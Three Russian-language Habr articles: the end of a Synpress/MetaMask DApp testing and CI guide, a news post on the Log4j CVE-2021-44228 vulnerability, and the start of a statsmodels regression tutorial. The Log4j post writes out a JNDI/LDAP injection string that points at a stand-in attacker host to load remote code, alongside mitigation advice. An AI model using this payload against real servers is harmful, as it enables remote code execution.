Если после установки Synpress зайти в пакет, то можно увидеть папку *metamask-chrome*. Это и есть уже предустановленное браузерное расширение. Работает оно за счет того, что мы добавили в конфиг файле плагин *synpressPlugins(on, config)*. При запуске теста происходит вызов глобального эвента beforeAll, который перед началом тестов открывает **metamask-chrome** в новой вкладке, где происходит авторизация в аккаунт и выбор тестовой сети. Всё это автоматически считывается из переменных, указанных в .env.
Тест всегда работает с 2 вкладками — основное окно с тестами (Cypress UI) и MetaMask. Теперь, после выполнения всех предусловий, активная вкладка меняется с кошелька на основную и запускается наш тест. Заходим на сайт, нажимаем на кнопку “*Connect*” . Это действие влечет за собой появления нотификации MetaMask. Чтобы принять подключение, используем один из методов Synpress *cy.acceptMetamaskAccess*, которые до этого мы подключили в файле *index.js*. Когда произошло подключение, нам важно удостовериться, что UI изменился. В данном случае у кнопки должен измениться текст на “Connected”, что значит успешное подключение.
Для Synpress есть множество [методов](https://github.com/synthetixio/synpress/blob/dev/support/index.d.ts) работы со всеми нотификациями, будь то создание транзакции или подписание сигнатуры. Этих возможностей хватает, чтобы покрыть тестами любой DApp.
Стоит отметить, что если вы покрываете кейс с созданием транзакции, то на вашем тестовом кошельке должно быть достаточное количество валюты, так как за запись транзакции в blockchain взимается небольшая комиссия. Для тестовых эфиров существует множество faucet (кранов), которые раздают ограниченное количество валюты раз в день, например, [этот](https://goerlifaucet.com/).
### Настройка тестов в CI/докере
Если перед вами стоит задача настроить запуск тестов в CI, то разработчики Synpress советуют использовать их настроенный [докер образ](https://github.com/Synthetixio/synpress#-using-with-docker) со всеми предустановленными для этого зависимостями. Он особенно хорош, если у вас большая система (и, соответственно, много больших и тяжеловесных тестов) и вы хотите тонко настроить запуск тестов и изолировать их. Собранный контейнер поддерживает ngrok, записывает и сохраняет видео и прочие фишки.
Для запуска тестов в контейнере нам сперва нужно скопировать из репозитория 2 файла — [Dockerfile](https://github.com/Synthetixio/synpress/blob/dev/Dockerfile) и [docker-compose.yml](https://github.com/Synthetixio/synpress/blob/dev/docker-compose.yml). Dockerfile берет готовый образ для работы тестов Synpress, затем копирует туда все зависимости из нашего проекта. Отсюда получается новый образ, из которого уже docker-compose собирает контейнер с сервисами и запускает в нем тесты.
На нашем проекте я тестирую на dev, а не локально. Соответственно я могу укоротить docker-compose файл, убрав лишние для меня сервисы. Получилось так, и дальше я объясню почему:
```
version: '3.9'
services:
synpress:
container_name: synpress
build: .
environment:
— DISPLAY=display:0.0
— PRIVATE_KEY=${PRIVATE_KEY}
— GITHUB_TOKEN=${GITHUB_TOKEN}
— DEBUG=${DEBUG}
— GH_PAT=${GH_PAT}
— GH_USERNAME=${GH_USERNAME}
depends_on:
— display
entrypoint: []
working_dir: /app
command: >
bash —c 'echo —n "======> local noVNC URL:
http://localhost:8080/vnc.html?autoconnect=true " && npx wait-on
http://display:8080 && yarn test'
networks:
— x11
display:
container_name: display
image: synthetixio/display:b2643097e891906524e52e7ee956260b20fa01fb-base
environment:
— RUN_XTERM=no
— DISPLAY_WIDTH=${DISPLAY_WIDTH}
— DISPLAY_HEIGHT=${DISPLAY_HEIGHT}
ports:
— '8080:8080'
networks:
— x11
networks:
x11:
```
Собрать контейнер можно командой:
`docker-compose --env-file ./{YOUR_ENV_FILE_NAME} --build --exit-code-from synpress`
В флаге --*env-file* нужно указать название файла с конфигом для докера. Он нужен для работы сервиса display, т.к. из него берутся переменные *DISPLAY\_WIDTH* и *DISPLAY\_HEIGHT*.
Поэтому создадим конфиг файл с названием *docker.config* и поместим туда эти переменные.
```
DISPLAY_WIDTH=1366
DISPLAY_HEIGHT=768
```
Они обозначают разрешение экрана отображаемой системы внутри докера — высоту и ширину соответственно. Synpress работает на всех разрешениях, начиная с 800x600.
Но зачем отображать виртуальный экран, если мы точно не будем смотреть на него (по крайней мере в CI)? Основная цель сервиса display чуть глубже. Так, в документации по запуску Cypress в CI указано, что для работы приложения должен быть запущен x11 сервер. Все дело в том, что Cypress требует возможности запуска своего графического интерфейса, а эмулятор Xvfb (X virtual framebuffer, он же X11, он же просто X) как раз и нужен для его отображения и взаимодействия с ним в докеровской подсистеме Linux. В нашем случае, отображение идет на 8080 порту, к которому при помощи noVNC мы подключаемся удаленно и можем отслеживать ход тестов. Без этого сервиса Cypress будет выдавать ошибку. Обо всем этом описано в документации по [запуску Cypress тестов в CI](https://docs.cypress.io/guides/continuous-integration/introduction#Xvfb).
Чтобы запустить докер в CI (опять же, на примере GH Actions) можно использовать уже готовые контейнер-образы. Для работы докера нужно подключить два образа в workflow файле, а конкретно:
1. docker/setup-qemu-action
2. docker/setup-buildx-action
Qemu нужен для эмуляции системы внутри докера, а buildx предоставляет комплект для билда докерфайла.
Конечный вид workflow файла для запуска тестов:
```
on:
push:
branches:
— master
jobs:
e2e:
name: E2E with docker
runs-on: ubuntu-18.04
steps:
# Изменяет владельца всех файлов на нас внутри системы
# Нужно для работы докера
— name: Chown workspace
run: chown —R $(whoami) .
# Делает pull репозитория и ветки, в котором запущен. Нужно для доступа к коду
— name: Checkout
uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8
# Нужен для эмуляции системы внутри докера
— name: Set up QEMU
uses: docker/setup-qemu-action@8b122486cedac8393e77aa9734c3528886e4a1a8
# Предоставляет комплект для билда докерфайла
— name: Set up Docker Buildx
uses: docker/setup-buildx-action@dc7b9719a96d48369863986a06765841d7ea23f6
— name: Run e2e-test
run: |
docker-compose —-env-file ./.env up --build --exit-code-from synpress
env:
COMPOSE_DOCKER_CLI_BUILD: 1
DOCKER_BUILDKIT: 1
DOCKER_DEFAULT_PLATFORM: linux/amd64
PRIVATE_KEY: ${{ env.PRIVATE_KEY }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
GH_PAT: ${{ secrets.GH_PAT }}
GH_USERNAME: ${{ secrets.GH_USERNAME }}
```
Таким же образом описана джоба у разработчиков, поэтому я не менял тэги у actions, чтобы все работало одинаково.
На последнем шаге вызываем docker-compose команду, которая, собственно, собирает контейнер и запускает тесты.
Результат должен получиться примерно такой:
### Подытожим
Synpress на данный момент самый удобный инструмент для сквозного тестирования DApp, особенно если вы уже имели дело с Cypress. С ним легко работать: конфигурировать, писать тесты, запускать в CI и делать репорты. Также, он активно развивается и разработчики часто выкатывают новые релизы.
Работающий пример с инструкцией я залил в [репу](https://github.com/TourmalineCore/Metamask.SynpressTests). Надеюсь, эта статья была вам полезна. | https://habr.com/ru/post/708622/ | null | ru | null |
# Новая Zero-day уязвимость позволяет выполнение произвольного кода через журнал логирования log4j
Недавно обнаруженная уязвимость нулевого дня в широко используемой библиотеке логирования Java Apache Log4j легко эксплуатируется и позволяет злоумышленникам получить полный контроль над уязвимыми серверами.
Уязвимость, [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228), классифицируется как серьезная и позволяет выполнять удаленный код без аутентификации, поскольку пользователь, запускающий приложение, использует библиотеку логирования Java. Уязвимость была впервые обнаружена в Minecraft.
Затронуты все системы и службы, использующие библиотеку логирования Java, Apache Log4j между версиями 2.0 и 2.14.1, включая многие службы и приложения, написанные на Java. Вот [примеры](https://github.com/YfryTchsGD/Log4jAttackSurface) того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Выглядит это так:
1. Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2. JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3. В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
**Временный фикс:** `JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true"` или же обновить версии Log4j до log4j-2.15.0-rc1.
**UPD:**
Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL. | https://habr.com/ru/post/594751/ | null | ru | null |
# Регрессионный анализ в DataScience. Простая линейная регрессия. Библиотека statsmodels
АКТУАЛЬНОСТЬ ТЕМЫ
-----------------
### Общие положения
Про регрессионный анализ вообще, и его применение в DataScience написано очень много. Есть множество учебников, монографий, справочников и статей по прикладной статистике, огромное количество информации в интернете, примеров расчетов. Можно найти множество кейсов, реализованных с использованием средств Python. Казалось бы - что тут еще можно добавить?
Однако, как всегда, есть нюансы:
1. Регрессионный анализ - это прежде всего процесс, набор действий исследователя по определенному алгоритму: **"подготовка исходных данных - построение модели - анализ модели - прогнозирование с помощью модели"**. Это ключевая особенность. Не представляет особой сложности сформировать DataFrame исходных данных и построить модель, запустить процедуру из библиотеки **statsmodels**. Однако подготовка исходных данных и последующий анализ модели требуют гораздо больших затрат человеко-часов специалиста и строк программного кода, чем, собственно, построение модели. На этих этапах часто приходится возвращаться назад, корректировать модель или исходные данные. Этому, к сожалению, во многих источниках, не удаляется достойного внимания, а иногда - и совсем не уделяется внимания, что приводит к превратному представлению о регрессионном анализе.
2. Далеко не во всех источниках уделяется должное внимание интерпретации промежуточных и финальных результатов. Специалист должен уметь интерпретировать каждую цифру, полученную в ходе работы над моделью.
3. Далеко не все процедуры на этапах подготовки исходных данных или анализа модели в источниках разобраны подробно. Например, про проверку значимости коэффициента детерминации найти информацию не представляет труда, а вот про проверку адекватности модели, построение доверительных интервалов регрессии или про специфические процедуры (например, тест Уайта на гетероскедастичность) информации гораздо меньше.
4. Своеобразная сложность может возникнуть с проверкой статистических гипотез: для отечественной литературы по прикладной статистике больше характерно проверять гипотезы путем сравнения расчетного значения критерия с табличным, а в иностранных источниках чаще определяется расчетный уровень значимости и сравнивается с заданным (чаще всего 0.05 = 1-0.95). В разных источниках информации реализованы разные подходы. Инструменты **python** (прежде всего библиотеки **scipy** и **statsmodels**) также в основном оперируют с расчетным уровнем значимости.
5. Ну и, наконец, нельзя не отметить, что техническая документация библиотеки **statsmodels** составлена, на мой взгляд, далеко не идеально: информация излагается путано, изобилует повторами и пропусками, описание классов, функций и свойств выполнено фрагментарно и количество примеров расчетов - явно недостаточно.
Поэтому я решил написать ряд обзоров по регрессионному анализу средствами **Python**, в которых акцент будет сделан на практических примерах, алгоритме действий исследователя, интерпретации всех полученных результатов, конкретных методических рекомендациях. Буду стараться по возможности избегать теории (хотя совсем без нее получится) - все-таки предполагается, что специалист DataScience должен знать теорию вероятностей и математическую статистику, хотя бы в рамках курса высшей математики для технического или экономического вуза.
В данном статье остановимся на самои простом, классическом, стереотипном случае - **простой линейной регрессии (simple linear regression)**, или как ее еще принято называть - **парной линейной регрессионной модели (ПЛРМ)** - в ситуации, когда исследователя не подстерегают никакие подводные камни и каверзы - исходные данные подчиняются нормальному закону, в выборке отсутствуют аномальные значения, отсутствует ложная корреляция. Более сложные случаи рассмотрим в дальнейшем.
Для построение регрессионной модели будем пользоваться библиотекой **statsmodels**.
В данной статье мы рассмотрим по возможности полный набор статистических процедур. Некоторые из них (например, дескриптивная статистика или дисперсионный анализ регрессионной модели) могут показаться избыточными. Все так, но эти процедуры улучшают наше представление о процессе и об исходных данных, поэтому в разбор я их включил, а каждый исследователь сам вправе для себя определить, потребуются ему эти процедуры или нет.
### Краткий обзор источников
Источников информации по корреляционному и регрессионному анализу огромное количество, в них можно просто утонуть. Поэтому позволю себе просто порекомендовать ряд источников, на мой взгляд, наиболее полезных:
1. Кобзарь А.И. Прикладная математическая статистика. Для инженеров и научных работников. - М.: ФИЗМАТЛИТ, 2006. - 816 с.
2. Львовский Е.Н. Статистические методы построения эмпирических формул. - М.: Высшая школа, 1988. - 239 с.
3. Фёрстер Э., Рёнц Б. Методы корреляционного и регрессионного анализа / пер с нем. - М.: Финансы и статистика, 1983. - 302 с.
4. Афифи А., Эйзен С. Статистический анализ. Подход с использованием ЭВМ / пер с англ. - М.: Мир, 1982. - 488 с.
5. Дрейпер Н., Смит Г. Прикладной регрессионный анализ. Книга 1 / пер.с англ. - М.: Финансы и статистика, 1986. - 366 с.
6. Айвазян С.А. и др. Прикладная статистика: Исследование зависимостей. - М.: Финансы и статистика, 1985. - 487 с.
7. Прикладная статистика. Основы эконометрики: В 2 т. 2-е изд., испр. - Т.2: Айвазян С.А. Основы эконометрики. - М.: ЮНИТИ-ДАНА, 2001. - 432 с.
8. Магнус Я.Р. и др. Эконометрика. Начальный курс - М.: Дело, 2004. - 576 с.
9. Носко В.П. Эконометрика. Книга 1. - М.: Издательский дом "Дело" РАНХиГС, 2011. - 672 с.
10. Брюс П. Практическая статистика для специалистов Data Science / пер. с англ. - СПб.: БХВ-Петербург, 2018. - 304 с.
11. Уатт Дж. и др. Машинное обучение: основы, алгоритмы и практика применения / пер. с англ. - СПб.: БХВ-Петербург, 2022. - 640 с.
Прежде всего следует упомянуть справочник Кобзаря А.И. [1] - это безусловно выдающийся труд. Ничего подобного даже близко не издавалось. Всем рекомендую иметь под рукой.
Есть очень хорошее практическое пособие [2] - для начинающих и практиков.>
Добротная работа немецких авторов [3]. Все разобрано подробно, обстоятельно, с примерами - очень хорошая книга. Примеры приведены из области экономики.
Еще одна добротная работа - [4], с примерами медико-биологического характера.
Работа [5] считается одним из наиболее полных изложений прикладного регрессионного анализа.
Более сложные работы - [6] (классика жанра), [7], [8], [9] - выдержаны на достаточно высоком математическом уровне, примеры из экономической области.
Свежие работы [10] (с примерами на языке **R**) и [11] (с примерами на **python**).
#### Cтатьи
Статей про регрессионный анализ в DataScience очень много, обращаю внимание на некоторые весьма полезные из них.
Серия статей **"Python, корреляция и регрессия"**, охватывающая весь процесс регрессионного анализа:
* [первичная обработка данных, визуализация и корреляционный анализ](https://habr.com/ru/post/557998/);
* [регрессия](https://habr.com/ru/post/558084/);
* [теория матриц в регрессионном анализе, проверка адекватности, мультиколлинеарность](https://habr.com/ru/post/558146/);
* [прогнозирование с помощью регрессионных моделей](https://habr.com/ru/post/558158/).
Очень хороший обзор [**"Интерпретация summary из statsmodels для линейной регрессии"**](https://habr.com/ru/post/681218/). В этой статье даны очень полезные ссылки:
* [Statistical Models](http://work.thaslwanter.at/Stats/html/statsModels.html)
* [Interpreting Linear Regression Through statsmodels .summary()](https://medium.com/swlh/interpreting-linear-regression-through-statsmodels-summary-4796d359035a.)
Статья [**"Регрессионные модели в Python"**](https://nagornyy.me/it/regressionnye-modeli-v-python/).
### Основные предпосылки (гипотезы) регрессионного анализа
Очень кратко - об этом написано тысячи страниц в учебниках - но все же вспомним некоторые основы теории.
Проверка исходных предпосылок является очень важным моментом при статистическом анализе регрессионной модели. Если мы рассматриваем классическую линейную регрессионную модель вида:
то основными предпосылками при использовании **обычного метода наименьших квадратов (МНК)** для оценки ее параметров являются:
1. Среднее значение (математическое ожидание) случайной составляющей равно нулю:
2. Дисперсия случайной составляющей является постоянной:
В случае нарушения данного условия мы сталкиваемся с явлением **гетероскедастичности**.
3. Значения случайной составляющей статистически независимы (некоррелированы) между собой:
В случае нарушения данного условия мы сталкиваемся с явлением **автокорреляции**.
4. Условие существования обратной матрицы
что эквивалентно одному из двух следующих условий:
то есть **число наблюдений должно превышать число параметров**.
5. Значения случайной составляющей некоррелированы со значениями независимых переменных:
6. Случайная составляющая имеет нормальный закон распределения (с математическим ожиданием равным нулю - следует из условия 1):
Более подробно - см.: [3, с.90], [4, с.147], [5, с.122], [6, с.208], [7, с.49], [8, с.68], [9, с.88].
Кроме гетероскедастичности и автокорреляции возможно возникновение и других статистических аномалий - мультиколлинеарности, ложной корреляции и т.д.
Доказано, что оценки параметров, полученные с помощью МНК, обладают наилучшими свойствами (несмещенность, состоятельность, эффективность) при соблюдении ряда условий:
* выполнение приведенных выше исходных предпосылок регрессионного анализа;
* **число наблюдений на одну независимую переменную должно быть не менее 5-6**;
* должны отсутствовать аномальные значения (выбросы).
Кроме обычного МНК существуют и другие его разновидности (взвешенный МНК, обобщенный МНК), которые применяются при наличии статистических аномалий. Кроме МНК применяются и другие методы оценки параметров моделей. В этом обзоре мы эти вопросы рассматривать не будем.
### Алгоритм проведения регрессионного анализа
Алгоритм действий исследователя при построении регрессионной модели (полевые работы мы, по понятным причинам, не рассматриваем - считаем, что исходные данные уже получены):
1. Подготовительный этап - постановка целей и задач исследования.
2. Первичная обработка исходных данных - об этом много написано в учебниках и пособиях по DataScience, сюда могут относится:
* выявление нерелевантных признаков (признаков, которые не несут полезной информации), нетипичных данных (выбросов), неинформативных признаков (имеющих большое количество одинаковых значений) и работа с ними (удаление/преобразование);
* выделение категориальных признаков;
* работа с пропущенными значениями;
* преобразование признаков-дат в формат **datetime** и т.д.
3. Визуализация исходных данных - предварительный графический анализ.
4. Дескриптивная (описательная) статистика - расчет выборочных характеристик и предварительные выводы о свойствах исходных данных.
5. Исследование закона распределения исходных данных и, при необходимости, преобразование исходных данных к нормальному закону распределения.
6. Выявление статистически аномальных значений (выбросов), принятие решения об их исключении.
Этапы 4, 5 и 6 могут быть при необходимости объединены.
7. Корреляционный анализ - исследование корреляционных связей между исходными данными; это разведка перед проведением регрессионного анализа.
8. Построение регрессионной модели:
* выбор моделей;
* выбор методов;
* оценка параметров модели.
9. Статистический анализ регрессионной модели:
* оценка ошибок аппроксимации (**error metrics**);
* анализ остатков (проверка нормальности распределения остатков и гипотезы о равенстве нулю среднего значения остатков);
* проверка адекватности модели;
* проверка значимости коэффициента детерминации;
* проверка значимости коэффициентов регрессии;
* проверка мультиколлинеарности (для множественных регрессионных моделей; вообще мультиколлинеарные переменные выявляются еще на стадии корреляционного анализа);
* проверка автокорреляции;
* проверка гетероскедастичности.
Этапы 8 и 9 могут быть при необходимости повторяться несколько раз.
10. Сравнительный анализ нескольких регрессионных моделей, выбор наилучшей (при необходимости).
11. Прогнозирование с помощью регрессионной модели и оценка качества прогноза.
12. Выводы и рекомендации.
Само собой, этот алгоритм не есть истина в последней инстанции - в зависимости от особенностей исходных данных и вида модели могут возникать дополнительные задачи.
### Применение пользовательских функций
Далее в обзоре мной будут использованы несколько пользовательских функций для решения разнообразных задач. Все эти функции созданы для облегчения работы и уменьшения размера программного кода. Данные функции загружается из пользовательского модуля **my\_module\_\_stat.py**, который доступен в [моем репозитории на GitHub](https://github.com/AANazarov/MyModulePython). Лично мне так удобнее работать, хотя каждый исследователь сам формирует себе инструменты по душе - особенно в части визуализации. Желающие могут пользоваться этими функциями, либо создать свои.
Итак, вот перечень данных функций:
* **graph\_scatterplot\_sns** - функция позволяет построить точечную диаграмму средствами **seaborn** и сохранить график в виде png-файла;
* **graph\_hist\_boxplot\_probplot\_XY\_sns** - функция позволяет визуализировать исходные данные для простой линейной регрессии путем одновременного построения гистограммы, коробчатой диаграммы и вероятностного графика (для переменных X и Y) средствами **seaborn** и сохранить график в виде png-файла; имеется возможность выбирать, какие графики строить (h - hist, b - boxplot, p - probplot);
* **descriptive\_characteristics** - функция возвращает в виде **DataFrame** набор статистических характеристики выборки, их ошибок и доверительных интервалов;
* **detecting\_outliers\_mad\_test** - функция выполняет проверку наличия аномальных значений (выбросов) по **критерию наибольшего абсолютного отклонения** (более подробно - см.[1, с.547]);
* **norm\_distr\_check** - проверка нормальности распределения исходных данных с использованием набора из нескольких статистических тестов;
* **corr\_coef\_check** - функция выполняет расчет коэффициента линейной корреляции Пирсона, проверку его значимости и расчет доверительных интервалов; об этой функции я писал [в своей статье](https://habr.com/ru/post/683442/).
* **graph\_regression\_plot\_sns** - - функция позволяет построить график регрессионной модели.
Ряд пользовательских функций мы создаем в процессе данного обзора (они тоже включены в пользовательский модуль **my\_module\_\_stat.py**):
* **regression\_error\_metrics** - расчет ошибок аппроксимации регрессионной модели;
* **ANOVA\_table\_regression\_model** - вывод таблицы дисперсионного анализа регрессионной модели;
* **regression\_model\_adequacy\_check** - проверка адекватности регрессионной модели по критерию Фишера;
* **determination\_coef\_check** - проверка значимости коэффициента детерминации по критерию Фишера;
* **regression\_coef\_check** - проверка значимости коэффициентов регрессии по критеирю Стьюдента;
* **Goldfeld\_Quandt\_test**, **Breush\_Pagan\_test**, **White\_test** - проверка гетероскедастичности с использование тестов Голдфелда-Квандта, Бриша-Пэгана и Уайта соответственно;
* **regression\_pair\_predict** - функция для прогнозирования с помощью парной регрессионной модели: рассчитывает прогнозируемое значение переменной **Y** по заданной модели, а также доверительные интервалы среднего и индивидуального значения для полученного прогнозируемого значения **Y**;
* **graph\_regression\_pair\_predict\_plot\_sns** - прогнозирование: построение графика регрессионной модели (с доверительными интервалами) и вывод расчетной таблицы с данными для заданной области значений **X**.
ПОСТАНОВКА ЗАДАЧИ
-----------------
В качестве примера рассмотрим практическую задачу из области экспертизы промышленной безопасности - калибровку ультразвукового прибора для определения прочности бетона.
Итак, суть задачи: при обследовании несущих конструкций зданий и сооружений эксперт определяет прочность бетона с использованием ультразвукового прибора "ПУЛЬСАР-2.1", для которого необходимо предварительно построить градуировочную зависимость. Заключается это в следующем - производятся замеры с фиксацией следующих показателей:
* **X** - показания ультразвукового прибора "ПУЛЬСАР-2.1" (м/с)
* **Y** - результаты замера прочности бетона (методом отрыва со скалыванием) склерометром ИПС-МГ4.03.
Предполагается, что между показателями **X** и **Y** имеется линейная регрессионная зависимость, которая позволит прогнозировать прочность бетона на основании измерений, проведенных прибором "ПУЛЬСАР-2.1".
Были выполнены замеры фактической прочности бетона конструкций для бетонов одного вида с одним типом крупного заполнителя, с единой технологией производства. Для построения были выбраны 14 участков (не менее 12), включая участки, в которых значение косвенного показателя максимальное, минимальное и имеет промежуточные значения.
Настройка заголовков отчета:
```
# Общий заголовок проекта
Task_Project = 'Калибровка ультразвукового прибора "ПУЛЬСАР-2.1" \nдля определения прочности бетона'
# Заголовок, фиксирующий момент времени
AsOfTheDate = ""
# Заголовок раздела проекта
Task_Theme = ""
# Общий заголовок проекта для графиков
Title_String = f"{Task_Project}\n{AsOfTheDate}"
# Наименования переменных
Variable_Name_X = "Скорость УЗК (м/с)"
Variable_Name_Y = "Прочность бетона (МПа)"
# Константы
INCH = 25.4 # мм/дюйм
DecPlace = 5 # number of decimal places - число знаков после запятой
# Доверительная вероятность и уровень значимости:
p_level = 0.95
a_level = 1 - p_level
```
Подключение модулей и библиотек:
```
# Стандартные модули и библиотеки
import os # загрузка модуля для работы с операционной системой
import sys
import platform
print('{:<35}{:^0}'.format("Текущая версия Python: ", platform.python_version()), '\n')
import math
from math import * # подключаем все содержимое модуля math, используем без псевдонимов
import numpy as np
#print ("Текущая версия модуля numpy: ", np.__version__)
print('{:<35}{:^0}'.format("Текущая версия модуля numpy: ", np.__version__))
from numpy import nan
import scipy as sci
print('{:<35}{:^0}'.format("Текущая версия модуля scipy: ", sci.__version__))
import scipy.stats as sps
import pandas as pd
print('{:<35}{:^0}'.format("Текущая версия модуля pandas: ", pd.__version__))
import matplotlib as mpl
print('{:<35}{:^0}'.format("Текущая версия модуля matplotlib: ", mpl.__version__))
import matplotlib.pyplot as plt
import seaborn as sns
print('{:<35}{:^0}'.format("Текущая версия модуля seaborn: ", sns.__version__))
import statsmodels.api as sm
import statsmodels.formula.api as smf
import statsmodels.graphics.api as smg
import statsmodels.stats.api as sms
from statsmodels.compat import lzip
print('{:<35}{:^0}'.format("Текущая версия модуля statsmodels: ", sm.__version__))
import statistics as stat # module 'statistics' has no attribute '__version__'
import sympy as sym
print('{:<35}{:^0}'.format("Текущая версия модуля sympy: ", sym.__version__))
# Настройки numpy
np.set_printoptions(precision = 4, floatmode='fixed')
# Настройки Pandas
pd.set_option('display.max_colwidth', None) # текст в ячейке отражался полностью вне зависимости от длины
pd.set_option('display.float_format', lambda x: '%.4f' % x)
# Настройки seaborn
sns.set_style("darkgrid")
sns.set_context(context='paper', font_scale=1, rc=None) # 'paper', 'notebook', 'talk', 'poster', None
# Настройки Mathplotlib
f_size = 8 # пользовательская переменная для задания базового размера шрифта
plt.rcParams['figure.titlesize'] = f_size + 12 # шрифт заголовка
plt.rcParams['axes.titlesize'] = f_size + 10 # шрифт заголовка
plt.rcParams['axes.labelsize'] = f_size + 6 # шрифт подписей осей
plt.rcParams['xtick.labelsize'] = f_size + 4 # шрифт подписей меток
plt.rcParams['ytick.labelsize'] = f_size + 4
plt.rcParams['legend.fontsize'] = f_size + 6 # шрифт легенды
# Пользовательские модули и библиотеки
Text1 = os.getcwd() # вывод пути к текущему каталогу
#print(f"Текущий каталог: {Text1}")
sys.path.insert(1, "D:\REPOSITORY\MyModulePython")
from my_module__stat import *
```
ФОРМИРОВАНИЕ ИСХОДНЫХ ДАННЫХ
----------------------------
Показания ультразвукового прибора "ПУЛЬСАР-2.1" (м/с):
```
X = np.array([
4416, 4211, 4113, 4110, 4122,
4427, 4535, 4311, 4511, 4475,
3980, 4490, 4007, 4426
])
```
Результаты замера прочности бетона (методом отрыва со скалыванием) прибором ИПС-МГ4.03:
```
Y = np.array([
34.2, 35.1, 31.5, 30.8, 30.0,
34.0, 35.4, 35.8, 38.0, 37.7,
30.0, 37.8, 31.0, 35.2
])
```
Запишем данные в **DataFrame**:
```
calibrarion_df = pd.DataFrame({
'X': X,
'Y': Y})
display(calibrarion_df)
calibrarion_df.info()
```
Сохраняем данные в **csv**-файл:
```
calibrarion_df.to_csv(
path_or_buf='data/calibrarion_df.csv',
mode='w+',
sep=';')
```
Cоздаем копию исходной таблицы для работы:
```
dataset_df = calibrarion_df.copy()
```
ВИЗУАЛИЗАЦИЯ ДАННЫХ
-------------------
Границы значений переменных (при построении графиков):
```
(Xmin_graph, Xmax_graph) = (3800, 4800)
(Ymin_graph, Ymax_graph) = (25, 45)
```
```
# Пользовательская функция
graph_scatterplot_sns(
X, Y,
Xmin=Xmin_graph, Xmax=Xmax_graph,
Ymin=Ymin_graph, Ymax=Ymax_graph,
color='orange',
title_figure=Task_Project,
x_label=Variable_Name_X,
y_label=Variable_Name_Y,
s=100,
file_name='graph/scatterplot_XY_sns.png')
```
Существует универсальный набор графиков - гистограмма, коробчатая диаграмма, вероятностный график - которые позволяют исследователю сделать предварительные выводы о свойствах исходных данных.
Так как объем выборки невелик (n=14), строить гистограммы распределения переменных X и Y не имеет смысла, поэтому ограничимся построением коробчатых диаграмм и вероятностных графиков:
```
# Пользовательская функция
graph_hist_boxplot_probplot_XY_sns(
data_X=X, data_Y=Y,
data_X_min=Xmin_graph, data_X_max=Xmax_graph,
data_Y_min=Ymin_graph, data_Y_max=Ymax_graph,
graph_inclusion='bp', # выбираем для построения виды графиков: b - boxplot, p - probplot)
data_X_label=Variable_Name_X,
data_Y_label=Variable_Name_Y,
title_figure=Task_Project,
file_name='graph/hist_boxplot_probplot_XY_sns.png')
```
Для сравнения характера распределений переменных X и Y возможно также построить совмещенную коробчатую диаграмму по стандартизованным данным:
```
# стандартизуем исходные данные
standardize_df = lambda X: ((X - np.mean(X))/np.std(X))
dataset_df_standardize = dataset_df.copy()
dataset_df_standardize = dataset_df_standardize.apply(standardize_df)
display(dataset_df_standardize)
# построим график
fig, axes = plt.subplots(figsize=(210/INCH, 297/INCH/2))
axes.set_title("Распределение стандартизованных переменных X и Y", fontsize = 16)
sns.boxplot(
data=dataset_df_standardize,
orient='h',
width=0.5,
ax=axes)
plt.show()
```
Графический анализ позволяет сделать следующие **выводы**:
1. Отсутствие выбросов на коробчатых диаграммах свидетельствует об однородности распределения переменных.
2. Смещение медианы вправо на коробчатых диаграммах свидетельствует о левосторонней асимметрии распределения.
ДЕСКРИПТИВНАЯ (ОПИСАТЕЛЬНАЯ СТАТИСТИКА)
---------------------------------------
Собственно говоря, данный этап требуется проводить далеко не всегда, однако с помощью статистических характеристик выборки мы тоже можем сделать полезные выводы.
Описательная статистика исходных данных средствами библиотеки **Pandas** - самый простой вариант:
```
dataset_df.describe()
```
Описательная статистика исходных данных средствами библиотеки **statsmodels** - более развернутый вариант, с большим количеством показателей:
```
from statsmodels.stats.descriptivestats import Description
result = Description(
dataset_df,
stats=["nobs", "missing", "mean", "std_err", "ci", "ci", "std", "iqr", "mad", "coef_var", "range", "max", "min", "skew", "kurtosis", "mode",
"median", "percentiles", "distinct", "top", "freq"],
alpha=a_level,
use_t=True)
display(result.summary())
```
Описательная статистика исходных данных с помощью пользовательской функции **descriptive\_characteristics**:
```
# Пользовательская функция
descriptive_characteristics(X)
```
**Выводы**:
1. Сравнение показателей среднего арифметического (**mean**) и медианы (**median**) свидетельствует о **левосторонней асимметрии** (т.к.**mean** < **median**).
2. Значение коэффициента вариации **CV = 0.0445** и доверительный интервал для него **0.0336 ≤ CV ≤ 0.0657** свидетельствует об **однородности** исходных данных (т.к. **CV ≤ 0.33**).
3. Значение показателя асимметрии **skew (As) = -0.3101** свидетельствует об **умеренной левосторонней асимметрии** распределении (т.к. **|As| ≤ 0.5, As < 0**).
4. Значение показателя эксцесса **kurtosis (Es) = -1.4551** свидетельствует **о плосковершинном распределении (platykurtic distribution)** (т.к. **Es < 0**).
```
# Пользовательская функция
descriptive_characteristics(Y)
```
**Выводы**:
1. Сравнение показателей среднего арифметического (**mean**) и медианы (**median**) свидетельствует о **левосторонней асимметрии** (т.к.**mean** < **median**).
2. Значение коэффициента вариации **CV = 0.0822** и доверительный интервал для него **0.06202 ≤ CV ≤ 0.1217** свидетельствует об **однородности** исходных данных (т.к. **CV ≤ 0.33**).
3. Значение показателя асимметрии **skew (As) = -0.1109** свидетельствует о **приблизительно симметричном** распределении (т.к. **|As| ≤ 0.25**).
4. Значение показателя эксцесса **kurtosis (Es) = -1.3526** свидетельствует **о плосковершинном распределении (platykurtic distribution)** (т.к. **Es < 0**).
ПРОВЕРКА НОРМАЛЬНОСТИ РАСПРЕДЕЛЕНИЯ
-----------------------------------
